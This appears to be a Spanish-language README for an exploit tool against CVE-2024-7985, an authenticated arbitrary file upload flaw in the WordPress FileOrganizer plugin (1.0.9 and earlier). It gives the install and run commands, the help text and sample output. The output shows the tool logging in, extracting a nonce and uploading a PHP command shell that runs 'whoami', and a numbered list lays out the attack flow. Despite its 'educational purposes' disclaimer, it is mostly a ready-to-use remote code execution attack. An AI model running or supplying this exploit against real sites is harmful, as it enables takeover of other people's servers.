
FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+)
FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+)
CVE-2024-7985 - El plugin FileOrganizer <= 1.0.9 de WordPress es vulnerable a subidas arbitrarias de archivos autenticadas, permitiendo a atacantes con privilegios de Suscriptor+ subir y ejecutar archivos maliciosos de forma remota. Esta vulnerabilidad surge de la falta de validación del tipo de archivo en la función fileorganizer_ajax_handler, haciendo posible la ejecución remota de código (RCE).
🚨 ¡Este exploit permite a los atacantes ejecutar comandos arbitrarios en el servidor! 🚨
requestsbeautifulsoup4Instalar dependencias:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Subida Arbitraria de Archivos Autenticada (Suscriptor+) por | Nxploit Khaled_alenazi
options:
-h, --help muestra este mensaje de ayuda y sale
--url URL URL del sitio WordPress objetivo
--username USERNAME Nombre de usuario de WordPress
--password PASSWORD Contraseña de WordPress
--cmd CMD Comando a ejecutar en el archivo subido
[+] Versión vulnerable detectada: 1.0.9
[+] ¡Inicio de sesión exitoso!
[+] Nonce extraído: 7b4a95872b
[+] ¡Archivo subido exitosamente!
[+] Acceda al archivo en: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ Verificación de versión - Determina si el sitio es vulnerable.
2️⃣ Autenticación - Inicia sesión en WordPress.
3️⃣ Extracción de nonce - Obtiene el token de seguridad.
4️⃣ Subida de archivo - Sube un script PHP malicioso.
5️⃣ Ejecución de comandos - Ejecuta los comandos especificados por el usuario.
Este script es solo con fines educativos; el autor no asume ninguna responsabilidad por su uso indebido o consecuencias. 🚨